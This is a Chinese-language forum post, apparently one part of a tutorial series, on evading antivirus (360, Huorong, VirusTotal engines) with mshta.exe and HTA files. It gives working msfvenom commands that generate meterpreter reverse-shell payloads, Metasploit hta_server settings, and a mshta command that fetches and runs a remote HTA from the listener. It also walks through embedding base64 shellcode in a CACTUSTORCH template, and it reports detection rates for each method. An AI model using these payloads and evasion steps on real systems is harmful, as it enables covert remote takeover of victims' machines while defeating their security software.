几点说明:
1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),火绒版本5.0.34.16(2020.01.01),360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀或杀软查杀能力的判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。
一、Mshta.exe介绍
Mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件。
目前正常的hta文件用到的很少,偶尔见到了很可能就是恶意软件,很多免杀工具都是对shellcode进行处理后生产.hta文件,在windows下可以直接执行。
之前工具篇里多个工具都可以生成hta后门:
总体来看hta的免杀效果比较一般,其中专题18中的ASWCrypter算是稍微好一些的,主要是使用python对shellocde进行混淆,然后嵌入在hta中进行执行。我这里就不再介绍ASWCrypter,介绍几种其他的hta生成方法。
二、msf自生成hta(VT免杀率28/58)
先试下msfvenom生成的原始的hta文件的查杀率
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f hta-psh -o
test5.hta
virustotal.com上查杀率为28/56
三、msf的hta_server模块(VT免杀率28/58)
Metasploit中包含了一个"HTA Web Server"模块,可直接生产hta文件,并提供了web分发功能,使用比较方便。
使用msf生成一个hta文件
- <div>use exploit/windows/misc/hta_server</div><div>msf exploit(windows/misc/hta_server) > set srvhost 10.211.55.2</div><div>msf exploit(windows/misc/hta_server) > set lhost 10.211.55.2</div><div>msf exploit(windows/misc/hta_server) > exploit</div>
在测试机执行命令,360和火绒都会查杀。
- mshta.exe <a href="http://10.211.55.2:8080/0Cv7XgxLzSvN.hta" target="_blank">http://10.211.55.2:8080/0Cv7XgxLzSvN.hta</a>
virustotal.com中shell.exe文件28/58个报病毒
四、使用CACTUSTORCH的hta模板(VT免杀率26/58)
1、首先要选择一个待注入的exe文件,默认是rundll32.exe, 你也可以使用notepad.exe, calc.exe等,在CACTUSTORCH.hta文件中直接修改就行。
2、使用 Cobalt Strike或Metasploit生成一个32位的shellcode
- msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=3333 -f raw -o payload.bin
3、执行下面命令cat payload.bin | base64 -w 0
4、把生成的base64编码后的代码复制到CACTUSTORCH.hta文件中的Dim code : code =。
360和火绒都免杀,都可正常上线
msf中监听windows/meterpreter/reverse_https可正常上线
virustotal.com上查杀率为26/58,这个查杀率还是挺高的
五、参考资料
发表于 2020-3-7 23:15:01